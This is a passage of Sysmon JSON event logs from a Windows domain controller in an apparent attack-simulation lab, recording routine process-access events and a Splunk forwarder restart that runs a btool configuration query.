C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:31.031","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:31","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3126,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:31.031\r\nSourceProcessGUID: {41C8662E-1F74-5F25-0000-0010C4650300}\r\nSourceProcessId: 3884\r\nSourceThreadId: 3904\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-1FF3-5F25-0000-00107C4D0500}\r\nTargetProcessId: 4620\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:31.031","SourceProcessGUID":"{41C8662E-1F74-5F25-0000-0010C4650300}","SourceProcessId":"3884","SourceThreadId":"3904","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-1FF3-5F25-0000-00107C4D0500}","TargetProcessId":"4620","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:31","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":3127,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:31.299\r\nProcessGuid: {41C8662E-1FF3-5F25-0000-001041500500}\r\nProcessId: 4516\r\nImage: C:\\Windows\\System32\\cmd.exe\r\nFileVersion: 10.0.14393.0 (rs1_release.160715-1616)\r\nDescription: Windows Command Processor\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: Cmd.Exe\r\nCommandLine: C:\\Windows\\system32\\cmd.exe /c btool server list httpServerListener: --no-log\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {41C8662E-1F61-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A\r\nParentProcessGuid: {41C8662E-1FEF-5F25-0000-00106D380500}\r\nParentProcessId: 2584\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE\" restart --waitonpid=2488","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:55:31.299","ProcessGuid":"{41C8662E-1FF3-5F25-0000-001041500500}","Image":"C:\\Windows\\System32\\cmd.exe","FileVersion":"10.0.14393.0 (rs1_release.160715-1616)","Description":"Windows Command Processor","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"Cmd.Exe","CommandLine":"C:\\Windows\\system32\\cmd.exe /c btool server list httpServerListener: --no-log","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{41C8662E-1F61-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A","ParentProcessGuid":"{41C8662E-1FEF-5F25-0000-00106D380500}","ParentProcessId":"2584","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE\" restart --waitonpid=2488","EventReceivedTime":"2020-08-01 07:55:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:31","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3128,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:31.297\r\nSourceProcessGUID: {41C8662E-1FEF-5F25-0000-00106D380500}\r\nSourceProcessId: 2584\r\nSourceThreadId: 3476\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE\r\nTargetProcessGUID: {41C8662E-1FF3-5F25-0000-001041500500}\r\nTargetProcessId: 4516\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\System32\\ucrtbase.dll+9ea4a|C:\\Windows\\System32\\ucrtbase.dll+9e42e|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+43bc6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+13ac4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+12176|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+19082|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+d94e|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+1adfc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+4cf68|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:31.297","SourceProcessGUID":"{41C8662E-1FEF-5F25-0000-00106D380500}","SourceProcessId":"2584","SourceThreadId":"3476","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE","TargetProcessGUID":"{41C8662E-1FF3-5F25-0000-001041500500}","TargetProcessId":"4516","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\System32\\ucrtbase.dll+9ea4a|C:\\Windows\\System32\\ucrtbase.dll+9e42e|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+43bc6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+13ac4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+12176|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+19082|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+d94e|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+1adfc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE+4cf68|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:31","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3129,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:31.297\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 772\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-1FF3-5F25-0000-001041500500}\r\nTargetProcessId: 4516\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:31.297","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"772","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-1FF3-5F25-0000-001041500500}","TargetProcessId":"4516","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:55:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:31","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3130,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:31.297\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:31.297","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:31","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3131,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:31.297\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:31.297","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:31","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3132,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:31.297\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:31.297","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:31","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3133,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:31.297\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:31.297","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:31","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3134,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:31.297\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: 